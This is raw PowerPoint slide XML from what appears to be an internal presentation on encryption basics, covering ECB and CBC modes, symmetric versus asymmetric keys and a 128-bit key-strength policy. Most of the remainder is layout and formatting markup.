                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Electronic Code Book mode</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="0" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Plaintext patterns are not concealed</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Cipher Block Chaining mode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8" name="Shape 1128"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1129" name="Shape 1129"/>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-“Secret Key” above references either:</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	- the one key for a symmetric cipher</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>	- the secret or private key in an asymmetric cipher</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-if implementing an account/password store, talk to us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8" name="Shape 1188"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Shape 1189"/>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Idea: Make the cost of unauthorized retrieval of a message significantly higher than the value of the message</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Encryption is the process of making information unreadable by unauthorized persons</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> Cryptographic algorithms can be:</a:t>
            </a:r>
            <a:endParaRPr sz="16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5" name="Shape 1195"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1196" name="Shape 1196"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Talk about policy here – 128 bit key strength</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-talk about different ciphers in light of what they are good for!</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>-pic with door and key in it… “come on in”</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eg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/></Relationships>

</file>

<file path=ppt/slideLayouts/_rels/slideLayout5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eg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/></Relationships>

</file>

<file path=ppt/slideLayouts/_rels/slideLayout5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–Johnny Appleseed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="“Type a quote here.”"/>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2999418"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117"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18"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125"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26"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133"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34"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141"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42"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149"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50"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57"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58"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59"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66"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67"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68"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75"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76"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77"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84"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85"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86"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93"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94"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95"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02"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03"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04"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1"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12"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13"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20"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21"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22"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229"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236"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43"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44"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45"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52"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53"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54"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61"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62"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63"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70"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71"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72"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279"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286"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293"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300"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01"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02"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09"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10"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11"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18"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19"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20"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27"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28"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29"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36"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37"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38"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45"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46"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47"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354"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55" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275839"/>
            <a:ext cx="5743788" cy="7477761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="465364" indent="-465364" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="909637" indent="-452437" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1348739" indent="-434339" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1854200" indent="-482600" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2311400" indent="-482600" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="38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56"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63"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64"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65"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372"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73" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275839"/>
            <a:ext cx="5743788" cy="7477761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="465364" indent="-465364" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="909637" indent="-452437" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1348739" indent="-434339" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1854200" indent="-482600" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2311400" indent="-482600" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="38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74"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381"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88"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89"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90"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397"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98"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405"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406"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07"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414"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415"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16"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423"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424" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275839"/>
            <a:ext cx="5743788" cy="7477761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="465364" indent="-465364" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="909637" indent="-452437" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1348739" indent="-434339" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1854200" indent="-482600" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2311400" indent="-482600" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="38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25"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432"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439"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440"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41"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448"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455"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456"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57"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464"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465"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66"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473"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480"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481"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82"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="491" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1" y="-1"/>
            <a:ext cx="13004801" cy="9753601"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="13004800" cy="9753600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="489" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="0"/>
              <a:ext cx="10187095" cy="9753600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="010101">
                    <a:alpha val="51765"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="60000">
                  <a:srgbClr val="FEFEFE">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="-19636" t="62278" r="119636" b="37721"/>
              </a:path>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="490" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1625600" y="0"/>
              <a:ext cx="11379200" cy="9753600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="010101">
                    <a:alpha val="56000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="61000">
                  <a:srgbClr val="FEFEFE">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="62278" t="119636" r="37721" b="-19636"/>
              </a:path>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Franklin Gothic Book"/>
                  <a:ea typeface="Franklin Gothic Book"/>
                  <a:cs typeface="Franklin Gothic Book"/>
                  <a:sym typeface="Franklin Gothic Book"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1268367" y="7989723"/>
            <a:ext cx="10500175" cy="7640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60" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10769" y="4154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21140" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="30000">
                <a:srgbClr val="010101">
                  <a:alpha val="34000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="010101">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="37721" t="-19636" r="62278" b="119636"/>
            </a:path>
          </a:gradFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="493" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407931" y="1446385"/>
            <a:ext cx="10211177" cy="6871672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="139700" dist="63500" dir="5400000">
              <a:srgbClr val="000000">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408853" y="1435946"/>
            <a:ext cx="10211177" cy="6871672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
          </a:blipFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="139700" dist="63500" dir="5400000">
              <a:srgbClr val="000000">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="495" name="C:\Users\Administrator\Desktop\Pushpin Dev\Assets\pushpinLeft.png" descr="C:\Users\Administrator\Desktop\Pushpin Dev\Assets\pushpinLeft.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1435684">
            <a:off x="1094429" y="998498"/>
            <a:ext cx="807583" cy="807581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="496" name="C:\Users\Administrator\Desktop\Pushpin Dev\Assets\pushpinLeft.png" descr="C:\Users\Administrator\Desktop\Pushpin Dev\Assets\pushpinLeft.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="4096196">
            <a:off x="11172171" y="1066268"/>
            <a:ext cx="806299" cy="806298"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2456463" y="114396"/>
            <a:ext cx="8140044" cy="5038351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:defRPr sz="6800">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2456462" y="5314306"/>
            <a:ext cx="8123988" cy="4439294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:srgbClr val="465E9C"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl1pPr>
